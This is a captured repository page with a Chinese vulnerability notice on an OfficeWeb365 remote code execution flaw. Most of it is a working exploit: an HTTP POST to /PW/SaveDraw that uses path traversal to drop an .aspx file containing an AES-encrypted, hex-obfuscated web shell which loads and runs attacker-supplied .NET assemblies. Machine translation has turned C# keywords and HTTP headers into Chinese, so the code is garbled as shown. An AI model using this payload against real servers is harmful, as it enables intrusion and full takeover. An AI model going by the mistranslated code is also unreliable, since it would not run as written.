Skip to content

Latest commit

 

History

History
50 lines (46 loc) · 3.2 KB

OfficeWeb365 远程代码执行漏洞.md

File metadata and controls

50 lines (46 loc) · 3.2 KB

【消息详情】:360漏洞云监测到网传《OfficeWeb365 远程代码执行漏洞》的消息,经漏洞云复核,确认为【真实】漏洞,漏洞影响【未知】版本,该漏洞标准化POC已经上传漏洞云情报平台,平台编号:360LDYLD-2023-00002453,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。

360漏洞云监测到网传《OfficeWeb365远程代码执行漏洞》的消息,经漏洞云复核,确认为【真实】漏洞,漏洞影响【未知】版本,该漏洞标准化POC已经升级漏洞云情报平台,平台编号: 360LDYLD-2023-00002453

# 详细

POST /PW/SaveDraw?path=../../Content/img&idx=1.aspx HTTP/1.1
主持人:xxx
用户代理:Mozilla/5.0(Macintosh;Intel Mac OS X 10_15_7)AppleWebKit/537.36(KHTML,如 Gecko)Chrome/88.0.434.18 Safari/537.36
内容长度:2265
内容类型:application/x-www-form-urlencoded
接受编码:gzip、deflate
连接:关闭
数据:image/png;base64,01s34567890123456789y12345678901234567m91<%@ 页面语言="C#" %>
    <%@Import 命名空间="System.Reflection" %>
    <脚本运行=“服务器”>
               私有字节[]解密(字节[]数据)
        {
            字符串键=“e45e329feb5d925b”;
            数据 = Convert.FromBase64String(System.Text.Encoding.UTF8.GetString(data));
            System.Security.Cryptography.RijndaelManaged aes = new System.Security.Cryptography.RijndaelManaged();
            aes.Mode = System.Security.Cryptography.CipherMode.ECB;
            aes.Key = Encoding.UTF8.GetBytes(key);
            aes.Padding = System.Security.Cryptography.PaddingMode.PKCS7;
            return aes.CreateDecryptor().TransformFinalBlock(data, 0, data.Length);
        }
        私有字节[]加密(字节[]数据)
        {
            字符串键=“e45e329feb5d925b”;
            System.Security.Cryptography.RijndaelManaged aes = new System.Security.Cryptography.RijndaelManaged();
            aes.Mode = System.Security.Cryptography.CipherMode.ECB;
            aes.Key = Encoding.UTF8.GetBytes(key);
            aes.Padding = System.Security.Cryptography.PaddingMode.PKCS7;
            返回 System.Text.Encoding.UTF8.GetBytes(Convert.ToBase64String(aes.CreateEncryptor().TransformFinalBlock(data, 0, data.Length)));
        }
    </脚本>
        <%
        //byte[] c=Request.BinaryRead(Request.ContentLength);Assembly.Load(Decrypt(c)).CreateInstance("U").Equals(this);
                byte[] c=Request.BinaryRead(Request.ContentLength);
          string asname=System.Text.Encoding.ASCII.GetString(new byte[] {0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x52,0x65,0x66,0x6c,0x65,0x63,0x74,0x69,0x6f, 0x6e,0x2e,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79});
          类型程序集=Type.GetType(asname);
           MethodInfo load = assembly.GetMethod("Load",new Type[] {new byte[0].GetType()});
           对象 obj=load.Invoke(null, new object[]{Decrypt(c)});
           MethodInfo create = assembly.GetMethod("CreateInstance",new Type[] { "".GetType()});
           字符串名称 = System.Text.Encoding.ASCII.GetString(new byte[] { 0x55 });
           object pay=create.Invoke(obj,new object[] { name });
           pay.Equals(this);%>>---